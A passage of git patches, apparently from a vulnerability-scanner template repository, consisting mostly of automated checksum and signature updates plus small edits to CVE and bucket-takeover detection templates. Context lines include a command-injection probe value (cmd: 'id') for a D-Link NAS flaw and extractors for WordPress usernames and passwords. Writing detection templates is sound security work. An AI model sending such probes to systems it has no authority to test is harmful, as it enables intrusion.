http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml:b4125e258896dd6b614f98e0443fdba778b4ca1a http/vulnerabilities/qibocms-file-download.yaml:c5c1fb9a39ad1d8ac93a8163154bb2887ddf150d http/vulnerabilities/rails/rails6-xss.yaml:b28fc53f49e6d7a89c50a3da233570d3b05199a4 @@ -8472,7 +8472,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:62659721a9f26994d94deebefa7c96ff8237fdfb +templates-checksum.txt:b5b4b5d0201aaf2aa7afda2670885331b6da00af wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f6478aa59d119f3ac24789e288dc05b0ac559211 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 May 2024 08:32:18 +0000 Subject: [PATCH 0540/1768] Auto Template Signing [Fri May 3 08:32:18 UTC 2024] :robot: --- .../prestashop/prestashop-cartabandonmentpro-file-upload.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml index 28b47529ae..3972c20e34 100644 --- a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml +++ b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml @@ -46,5 +46,4 @@ http: - 'contains(body_1, "{{filename}}.php.png")' - 'status_code_1 == 200 && status_code_2 == 200' condition: and - -# digest: 490a0046304402206cd9c0818aa36d2324bdd68ea91572b784f5d8ba039eb80723118081997fb883022072073af9c96011fb764121a837e5d489c22d27efd3498085aab2a9269088c147:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100de92782af5f1630bc6e15e5f559a18b2d829e22e0cea3452c013a54974c9c84f0221009371017eb7a14acd8fc29c5975ef5cd9f0b8f73582066b39db1294758b231b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 56bb872025983f49d00b7d2ee9c53e05164c1054 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 May 2024 08:41:23 +0000 Subject: [PATCH 0542/1768] Auto Generated Templates Checksum [Fri May 3 08:41:23 UTC 2024] :robot: --- templates-checksum.txt | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 62573315fb..95f0a10430 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2823,7 +2823,7 @@ http/cves/2022/CVE-2022-4320.yaml:85df1be119e20f7dd54ec90fe4f29813ec89fc90 http/cves/2022/CVE-2022-4321.yaml:18451ef7ed2083de058c2fc773cd4c0df5a2b383 http/cves/2022/CVE-2022-4325.yaml:f186020c216cd067428f78142dc9637ac51c3ec8 http/cves/2022/CVE-2022-4328.yaml:027d49a96bd49b38b06c63fe56e85df269c0af27 -http/cves/2022/CVE-2022-43769.yaml:c6a4115aa490d6bea5d94d4fd5313fafebf2ba56 +http/cves/2022/CVE-2022-43769.yaml:f4160adf6ac5d200afd49c9962d8fc9933a40247 http/cves/2022/CVE-2022-44290.yaml:c603b4cdf73c9b70df220546fb645d454fbfd368 http/cves/2022/CVE-2022-44291.yaml:50e4b9fef3f63a6f1166f23761c05ecea1412bbb http/cves/2022/CVE-2022-4447.yaml:c9d25f4aa9bb183e694aeaf192aef082aaa8488d @@ -2955,7 +2955,7 @@ http/cves/2023/CVE-2023-24733.yaml:8c12c7187efcc4652bb7bf6bb0069cbe8762fc0d http/cves/2023/CVE-2023-24735.yaml:35b457aeb699de6d59519aff249be662b70d4a37 http/cves/2023/CVE-2023-24737.yaml:facc801d9eca13c7392c35caa520fb642f0c5971 http/cves/2023/CVE-2023-2479.yaml:e380c2326f30db012e6a091a9a20bd2c9c56b0cd -http/cves/2023/CVE-2023-25135.yaml:123ab210e4561811b02eecec4b99eb2402772773 +http/cves/2023/CVE-2023-25135.yaml:074d3c1667ccbfe8845c92b8c94e96046263e02c http/cves/2023/CVE-2023-25157.yaml:a47b8df2e4f9871518e24d36431cc36466e35e36 http/cves/2023/CVE-2023-25194.yaml:754c9c257413b4590237bd3a90e17393dace3436 http/cves/2023/CVE-2023-25346.yaml:fca6cb7b61b9f36d5aaed4cc545a276e354c490d @@ -2993,7 +2993,7 @@ http/cves/2023/CVE-2023-2796.yaml:a25d85c244928e675267d06c4976d84d1a72d3d3 http/cves/2023/CVE-2023-28121.yaml:49ee6dc575ca492684912f95dbcc8810f3f29de0 http/cves/2023/CVE-2023-2813.yaml:485032b8c58efb4cdeb458a4387374d6faa9c4c5 http/cves/2023/CVE-2023-2822.yaml:b638b609770d15a230fa7246f171a5a654bce03e -http/cves/2023/CVE-2023-2825.yaml:05c22f1ab260687827e98d9eddab16c82012cc8e +http/cves/2023/CVE-2023-2825.yaml:2441407c59fc78e211633764183e2bd03b6ee143 http/cves/2023/CVE-2023-28343.yaml:c781cd98e3899efad10ad98e84ccad6bb0d2435c http/cves/2023/CVE-2023-28432.yaml:257ea32d858fb24d05fd61158b2c57b3ce5766f1 http/cves/2023/CVE-2023-28662.yaml:146d269965800ab6ea40ae0c05bb94f1bcacceb1 @@ -3055,7 +3055,7 @@ http/cves/2023/CVE-2023-34362.yaml:5e6a1ddcdf96d45153174df95d001082d9e22b1c http/cves/2023/CVE-2023-34537.yaml:ce2b42c314ea85f2cf7f4081e19600bcd2c5db7c http/cves/2023/CVE-2023-34598.yaml:90635e327c11d10e4dfc2da81ff445a669d976fb http/cves/2023/CVE-2023-34599.yaml:252d4509a26d36ab69876630693c3bf216802eb3 -http/cves/2023/CVE-2023-3460.yaml:02b8c5ee36c2524dc11a93652b0652232ec3876f +http/cves/2023/CVE-2023-3460.yaml:53092ba4cc2ed0c0bbfc237d4a34ca518d29926c http/cves/2023/CVE-2023-34659.yaml:752f2d986befb41386fb76463ee258482a720d80 http/cves/2023/CVE-2023-34751.yaml:725022730026691d6d788f2e23664b9068db36a6 http/cves/2023/CVE-2023-34752.yaml:e188543250435b6a6dc5e1082a9cdb02a17bc5f5 @@ -3242,7 +3242,7 @@ http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996 http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864 http/cves/2024/CVE-2024-21887.yaml:9e4e007bba9354b143ea5c286d57142e4a967673 http/cves/2024/CVE-2024-21893.yaml:fbd24aa08d6ee9e7b7c2a235810f1b6ee65aad1a -http/cves/2024/CVE-2024-22024.yaml:8f8fbb852668db0a337fbc6e9046e4a05c458be1 +http/cves/2024/CVE-2024-22024.yaml:3490d8c4927c20467848c383412cdc9790edf52b http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe @@ -7896,7 +7896,7 @@ http/vulnerabilities/phpmyadmin-unauth.yaml:d15ef415782dbc76f48b70d10f1520819b28 http/vulnerabilities/portainer-init-deploy.yaml:93713c9e50dea4da7a387e9be325229a914eb433 http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:1dde1d96626b10652831b3222e3f38f3c894fce4 http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml:e412881f521a4d5d350da2f825540251c38aabed -http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:d527e7072bcb76a31afb3f9709603002a73bd00a +http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:e66d21a9fdd51c9ccc829ac69c1d63f06181d5c1 http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml:b4125e258896dd6b614f98e0443fdba778b4ca1a http/vulnerabilities/qibocms-file-download.yaml:c5c1fb9a39ad1d8ac93a8163154bb2887ddf150d http/vulnerabilities/rails/rails6-xss.yaml:b28fc53f49e6d7a89c50a3da233570d3b05199a4 @@ -8472,7 +8472,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b5b4b5d0201aaf2aa7afda2670885331b6da00af +templates-checksum.txt:e0bae2627809973bebe7f3d221a7e04fe40b45f7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From bfcc41d2f25906af1214dc20e02525e20d59e985 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 May 2024 08:43:05 +0000 Subject: [PATCH 0543/1768] Auto Template Signing [Fri May 3 08:43:05 UTC 2024] :robot: --- http/cves/2022/CVE-2022-43769.yaml | 2 +- http/cves/2023/CVE-2023-25135.yaml | 2 +- http/cves/2023/CVE-2023-2825.yaml | 2 +- http/cves/2023/CVE-2023-3460.yaml | 2 +- http/cves/2024/CVE-2024-22024.yaml | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index eaee0a0002..a1ea1170f4 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -50,4 +50,4 @@ http: part: header words: - "application/json" -# digest: 4b0a004830460221008c170d16acd8d4fcd8b061a57759895cb1c1f4d2d844154a2bc28d348695383502210082727ca9d4adcdf1004042ef259119a55de484872ede8cad1aaf0ded1f7c2d8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6741a571d75e359c60ca79e0081337777b9697c68b0739b50509dc80d199bb3022051e8b48b4f9a5f97c6c7c753a04b14967c4a085998f070e01e462a0e8e0a6561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 1cb6538233..b5e1f0a9b1 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e3543011414a95d92a92d49677025acf633380fe2b7f42668cac5c7352466dd5022100fb6ff50e66a0ef042fe1a9d2f16946b7092d1049b62c8660449fb6c7fec3fd16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce2bf923005a767a1b859b3e4f2a4fce8709e03f3e8ca3913a9b86099ccf4d6d02203544ccb00bbe8541385556ded06192cb9d058e991038779cf79a4934da6495bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 36e8262102..1075e2abe9 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -210,4 +210,4 @@ http: - '"url":"\/uploads\/([0-9a-z]+)\/' internal: true part: body -# digest: 4a0a00473045022100fce13295307498034c0bfb69917e3f2561064c0812d5c1a8e27c0bcae996910102202f9c489427503620b35cc6d39d3bbc7826a351b2fd88f2c05ef19a5016ccfd70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce74731d4f03315a39203e3aa3775a80c5a82171b15cb8251c13b84816f869a502200e2fc502e7a3ab3a6d1d51fb7acb0c6a69777c3fb805501cc36ffdd30e3d4f27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index f14d64ceaf..13662666d8 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -103,4 +103,4 @@ http: dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password' -# digest: 490a0046304402206de691d2a93e1cd2ec763fc23e63c832a45a349293a8504cbc6d66638dc8d5a20220675e13ca1913ab9e44aba22dfc133154bda77a3b8ff2c4bc6f1881208f49b802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b493c7d63335e4d391cb5cc16773998839c91742ebdca9ed34de149a896d8635022100dd6e41ff08a478312111f10087ecd9bcf0cab2c7596f13f55ced60e7ff2102bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index 02ecbe0fcf..bdfeb11f65 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -46,4 +46,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b30b610e83925ba39d984d8e235e97014a180a7e945b4a35faec7386faa1b79b022026685bd4cdedbb97d9918ebdd5f362731b82b6368331fc30b6dcbfef0acaccdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e4986956dbe82e695b945961ec8886736ab7f120 Mon Sep 17 00:00:00 2001 From: edoardottt <edoardott@gmail.com> Date: Fri, 3 May 2024 10:50:53 +0200 Subject: [PATCH 0544/1768] Fix CVE-2024-32651 --- http/cves/2024/CVE-2024-32651.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-32651.yaml b/http/cves/2024/CVE-2024-32651.yaml index f4a247ac3b..4dbfdfba28 100644 --- a/http/cves/2024/CVE-2024-32651.yaml +++ b/http/cves/2024/CVE-2024-32651.yaml @@ -27,7 +27,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/" + - "{{RootURL}}/" redirects: true max-redirects: 2 From 985d0c7581d57f978234e4c332bbffe5ecb1ffb1 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 3 May 2024 16:25:34 +0700 Subject: [PATCH 0545/1768] feat: added kev tags to CVE-2024-3273.yaml --- http/cves/2024/CVE-2024-3273.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml index 9140100683..a65f5f06e1 100644 --- a/http/cves/2024/CVE-2024-3273.yaml +++ b/http/cves/2024/CVE-2024-3273.yaml @@ -21,7 +21,7 @@ info: metadata: verified: true fofa-query: app="D_Link-DNS-ShareCenter" - tags: cve,cve2024,dlink,nas + tags: cve,cve2024,dlink,nas,kev variables: cmd: "id" @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 480a00453043022055f08688d87627d1f6d57c487916c9884884e1032ac46525aab49882310ceb3e021f4ea7ae65ecc64abd81d4c033cab522110e08a8c7f4dc1395b60f90d99b9014:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043022055f08688d87627d1f6d57c487916c9884884e1032ac46525aab49882310ceb3e021f4ea7ae65ecc64abd81d4c033cab522110e08a8c7f4dc1395b60f90d99b9014:922c64590222798bb761d5b6d8e72950 From d6738c1130988d4c1fd90156459bc279461e9d35 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 May 2024 10:56:25 +0000 Subject: [PATCH 0546/1768] Auto Generated Templates Checksum [Fri May 3 10:56:25 UTC 2024] :robot: --- templates-checksum.txt | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 95f0a10430..902fc95874 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2823,7 +2823,7 @@ http/cves/2022/CVE-2022-4320.yaml:85df1be119e20f7dd54ec90fe4f29813ec89fc90 http/cves/2022/CVE-2022-4321.yaml:18451ef7ed2083de058c2fc773cd4c0df5a2b383 http/cves/2022/CVE-2022-4325.yaml:f186020c216cd067428f78142dc9637ac51c3ec8 http/cves/2022/CVE-2022-4328.yaml:027d49a96bd49b38b06c63fe56e85df269c0af27 -http/cves/2022/CVE-2022-43769.yaml:f4160adf6ac5d200afd49c9962d8fc9933a40247 +http/cves/2022/CVE-2022-43769.yaml:c486a19621f831f2ff911d73ccaabea6d3cd160c http/cves/2022/CVE-2022-44290.yaml:c603b4cdf73c9b70df220546fb645d454fbfd368 http/cves/2022/CVE-2022-44291.yaml:50e4b9fef3f63a6f1166f23761c05ecea1412bbb http/cves/2022/CVE-2022-4447.yaml:c9d25f4aa9bb183e694aeaf192aef082aaa8488d @@ -2955,7 +2955,7 @@ http/cves/2023/CVE-2023-24733.yaml:8c12c7187efcc4652bb7bf6bb0069cbe8762fc0d http/cves/2023/CVE-2023-24735.yaml:35b457aeb699de6d59519aff249be662b70d4a37 http/cves/2023/CVE-2023-24737.yaml:facc801d9eca13c7392c35caa520fb642f0c5971 http/cves/2023/CVE-2023-2479.yaml:e380c2326f30db012e6a091a9a20bd2c9c56b0cd -http/cves/2023/CVE-2023-25135.yaml:074d3c1667ccbfe8845c92b8c94e96046263e02c +http/cves/2023/CVE-2023-25135.yaml:8a3b6d23aac32527511e347c7212b8f8a227117b http/cves/2023/CVE-2023-25157.yaml:a47b8df2e4f9871518e24d36431cc36466e35e36 http/cves/2023/CVE-2023-25194.yaml:754c9c257413b4590237bd3a90e17393dace3436 http/cves/2023/CVE-2023-25346.yaml:fca6cb7b61b9f36d5aaed4cc545a276e354c490d @@ -2993,7 +2993,7 @@ http/cves/2023/CVE-2023-2796.yaml:a25d85c244928e675267d06c4976d84d1a72d3d3 http/cves/2023/CVE-2023-28121.yaml:49ee6dc575ca492684912f95dbcc8810f3f29de0 http/cves/2023/CVE-2023-2813.yaml:485032b8c58efb4cdeb458a4387374d6faa9c4c5 http/cves/2023/CVE-2023-2822.yaml:b638b609770d15a230fa7246f171a5a654bce03e -http/cves/2023/CVE-2023-2825.yaml:2441407c59fc78e211633764183e2bd03b6ee143 +http/cves/2023/CVE-2023-2825.yaml:e52fcd86c715c973f0d368fec0a8bbe61a0aa3ac http/cves/2023/CVE-2023-28343.yaml:c781cd98e3899efad10ad98e84ccad6bb0d2435c http/cves/2023/CVE-2023-28432.yaml:257ea32d858fb24d05fd61158b2c57b3ce5766f1 http/cves/2023/CVE-2023-28662.yaml:146d269965800ab6ea40ae0c05bb94f1bcacceb1 @@ -3055,7 +3055,7 @@ http/cves/2023/CVE-2023-34362.yaml:5e6a1ddcdf96d45153174df95d001082d9e22b1c http/cves/2023/CVE-2023-34537.yaml:ce2b42c314ea85f2cf7f4081e19600bcd2c5db7c http/cves/2023/CVE-2023-34598.yaml:90635e327c11d10e4dfc2da81ff445a669d976fb http/cves/2023/CVE-2023-34599.yaml:252d4509a26d36ab69876630693c3bf216802eb3 -http/cves/2023/CVE-2023-3460.yaml:53092ba4cc2ed0c0bbfc237d4a34ca518d29926c +http/cves/2023/CVE-2023-3460.yaml:88688540a54e02217069f7359cdbe3ddfde15289 http/cves/2023/CVE-2023-34659.yaml:752f2d986befb41386fb76463ee258482a720d80 http/cves/2023/CVE-2023-34751.yaml:725022730026691d6d788f2e23664b9068db36a6 http/cves/2023/CVE-2023-34752.yaml:e188543250435b6a6dc5e1082a9cdb02a17bc5f5 @@ -3242,7 +3242,7 @@ http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996 http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864 http/cves/2024/CVE-2024-21887.yaml:9e4e007bba9354b143ea5c286d57142e4a967673 http/cves/2024/CVE-2024-21893.yaml:fbd24aa08d6ee9e7b7c2a235810f1b6ee65aad1a -http/cves/2024/CVE-2024-22024.yaml:3490d8c4927c20467848c383412cdc9790edf52b +http/cves/2024/CVE-2024-22024.yaml:36f71684ca8bef143db91384fa7437000786c8b0 http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe @@ -3269,7 +3269,7 @@ http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 http/cves/2024/CVE-2024-31849.yaml:3da1475fe1c4acaa241663e897ab6a00caf6b49b http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 -http/cves/2024/CVE-2024-3273.yaml:ba09cef76e7e1002ae6d72d3d9b670f09562ca9b +http/cves/2024/CVE-2024-3273.yaml:e3b22d6dbe3be5aa7e69dd4a2d96a3c05421ca89 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 @@ -8472,7 +8472,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e0bae2627809973bebe7f3d221a7e04fe40b45f7 +templates-checksum.txt:ce44487735c4c9fc99cfe746908ffff0be249039 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f63fc7169fb4ea249553be3fe78d4e11aa68e018 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 May 2024 10:58:13 +0000 Subject: [PATCH 0547/1768] Auto Template Signing [Fri May 3 10:58:13 UTC 2024] :robot: --- http/cves/2024/CVE-2024-3273.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml index a65f5f06e1..eb7b78365f 100644 --- a/http/cves/2024/CVE-2024-3273.yaml +++ b/http/cves/2024/CVE-2024-3273.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 480a00453043022055f08688d87627d1f6d57c487916c9884884e1032ac46525aab49882310ceb3e021f4ea7ae65ecc64abd81d4c033cab522110e08a8c7f4dc1395b60f90d99b9014:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f7987354e025dbc03f2e1afa23c2973af3ef684babd4e5fd110f4a90f06083ab022100fb410f784e3b4a10502077ab8b122e04039b29dea9df90707725691983bfe80d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a993f5f6e8487157e4d7cc17ce8aeadaa4f48086 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Fri, 3 May 2024 06:01:46 -0500 Subject: [PATCH 0548/1768] Update aws-bucket-takeover.yaml (#9691) Solves some false positives https://123seva-troubleshoot-admin.cn-hangzhou.alipay-cdn.aliyun-inc.com https://123seva-omnigather-inner.cn-hangzhou.alipay-cdn.aliyun-inc.com --- http/takeovers/aws-bucket-takeover.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/takeovers/aws-bucket-takeover.yaml b/http/takeovers/aws-bucket-takeover.yaml index 30594f15cc..14182fabb1 100644 --- a/http/takeovers/aws-bucket-takeover.yaml +++ b/http/takeovers/aws-bucket-takeover.yaml @@ -31,6 +31,7 @@ http: - type: dsl dsl: - contains(tolower(header), 'x-guploader-uploadid') + - contains(tolower(header), "aliyunoss") negative: true - type: word @@ -77,4 +78,4 @@ http: regex: - '<li>BucketName: (.*?)</li>' - '<BucketName>(.*?)</BucketName>' -# digest: 4a0a00473045022052c03d64bf92ed3e2156360f7da406ef950a4292a8d29b08de54d645483122e1022100a8172443bfd3c3b235f40e2963f3f37d538106e9004629cd1393c789bfb7983c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052c03d64bf92ed3e2156360f7da406ef950a4292a8d29b08de54d645483122e1022100a8172443bfd3c3b235f40e2963f3f37d538106e9004629cd1393c789bfb7983c:922c64590222798bb761d5b6d8e72950 From f91320eb955471e28515b2a5436deb222460e002 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 May 2024 11:02:12 +0000 Subject: [PATCH 0549/1768] Auto Generated Templates Checksum [Fri May 3 11:02:12 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 902fc95874..06c571f9e9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3269,7 +3269,7 @@ http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 http/cves/2024/CVE-2024-31849.yaml:3da1475fe1c4acaa241663e897ab6a00caf6b49b http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 -http/cves/2024/CVE-2024-3273.yaml:e3b22d6dbe3be5aa7e69dd4a2d96a3c05421ca89 +http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 @@ -6458,7 +6458,7 @@ http/takeovers/aha-takeover.yaml:58e3e7a7486be85c7687c793b5663b84759788a8 http/takeovers/airee-takeover.yaml:bd00657159494039fc36913d03ddbf767fa1b93b http/takeovers/anima-takeover.yaml:959b664c800ede2e97646180a495f6295d916231 http/takeovers/announcekit-takeover.yaml:92fb87a534f3f920e480a963886f8796836c8383 -http/takeovers/aws-bucket-takeover.yaml:195e8c743d8ae301556d84355e46d6f4b0f5e193 +http/takeovers/aws-bucket-takeover.yaml:85490ff028be5d7f7abc038654e80f0a55471bfa http/takeovers/bigcartel-takeover.yaml:6a8f5abf7259eb5f4a4106653fc665b950b4190a http/takeovers/bitbucket-takeover.yaml:60402aa2ecf993deccac40923f21ce71974dc780 http/takeovers/campaignmonitor-takeover.yaml:615bfc25c0b488b95d44a0eda7bb5d7af254cacf @@ -8472,7 +8472,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ce44487735c4c9fc99cfe746908ffff0be249039 +templates-checksum.txt:6ff0f37ae13e24adfceb910899da406422ad96dd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e688a29bd52b604639b0e2615ad79359f05bbbfa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 May 2024 11:03:57 +0000 Subject: [PATCH 0550/1768] Auto Template Signing [Fri May 3 11:03:57 UTC 2024] :robot: --- http/takeovers/aws-bucket-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/takeovers/aws-bucket-takeover.yaml b/http/takeovers/aws-bucket-takeover.yaml index 14182fabb1..d4862198c0 100644 --- a/http/takeovers/aws-bucket-takeover.yaml +++ b/http/takeovers/aws-bucket-takeover.yaml @@ -78,4 +78,4 @@ http: regex: - '<li>BucketName: (.*?)</li>' - '<BucketName>(.*?)</BucketName>' -# digest: 4a0a00473045022052c03d64bf92ed3e2156360f7da406ef950a4292a8d29b08de54d645483122e1022100a8172443bfd3c3b235f40e2963f3f37d538106e9004629cd1393c789bfb7983c:922c64590222798bb761d5b6d8e72950 +# digest: 